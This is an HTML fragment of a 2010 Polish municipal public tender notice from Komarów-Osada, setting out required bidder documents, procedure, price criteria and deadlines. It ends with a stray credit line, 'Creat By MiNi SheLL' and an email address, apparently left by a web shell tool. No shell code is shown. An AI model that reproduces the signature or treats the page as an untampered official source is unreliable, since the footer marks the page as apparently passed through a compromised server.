<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Wypełniony formularz ofertowy stanowiący zał. Nr 1 do siwz
- Wypełniony kosztorys ofertowy stanowiący załącznik Nr 2 do SIWZ, który jest podstawą do sporządzenia ceny oferty. W tym postępowaniu obowiązuje cena kosztorysowa. Zamawiający zawrze umowę z wykonawcą, który przedłoży najkorzystniejszą cenę  na podstawie ceny kosztorysowej.    
5.3 Oświadczenie z art. 36 ustawy Pzp stanowiące załącznik Nr 9 do SIWZ. Wymagana forma oryginał
5.4. Pełnomocnictwo  jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy.
	Wymagana forma dokumentu oryginał lub kopia potwierdzona notarialnie.
- W przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć umowę spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników. Warunek ten nie ma zastosowania  w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru Krajowego Rejestru  Sądowego, jeżeli ujawniono w nim  wspólników spółki 
- Harmonogram rzeczowo-finansowy w układzie miesięcznym w rozbiciu na poszczególne etapy realizacji przedmiotu zamówienia.
	Forma dokumentu oryginał
- W przypadku załączenia  do oferty innych materiałów niż wymagane przez Zamawiającego (np. materiałów reklamowych, informacyjnych) pożądane  jest, aby stanowiły one odrębną  część  nie złączoną z oferta w sposób trwały
- Wszystkie złożone dokumenty przedkładane do oferty a sporządzone w języku obcym  muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Obowiązuje w niniejszym postępowania wersja w języku polskim
- Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych dokumentów , lub którzy nie złożyli pełnomocnictw, albo którzy złożyli  wymagane przez Zamawiającego oświadczenia i dokumenty w zakresie objętym art. 25 Pzp, zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia  oferta wykonawcy podlegałaby odrzuceniu  lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie  przez oferowane dostawy, usługi lub roboty budowlane  wymagań określonych przez Zamawiającego, nie później niż w dniu, w który upłynął termin składania ofert. 
- Zamawiający może wezwać w wyznaczonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa  w art. 25 ust. 1 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.komarowosada.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Komarów-Osada
ul. Rynek 15, 22-435 Komarów-Osada
I piętro pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2010 godzina 09:00, miejsce: Urząd Gminy Komarów-Osada
ul. Rynek 15, 22-435 Komarów-Osada
I piętro pokój nr 6 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej  w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com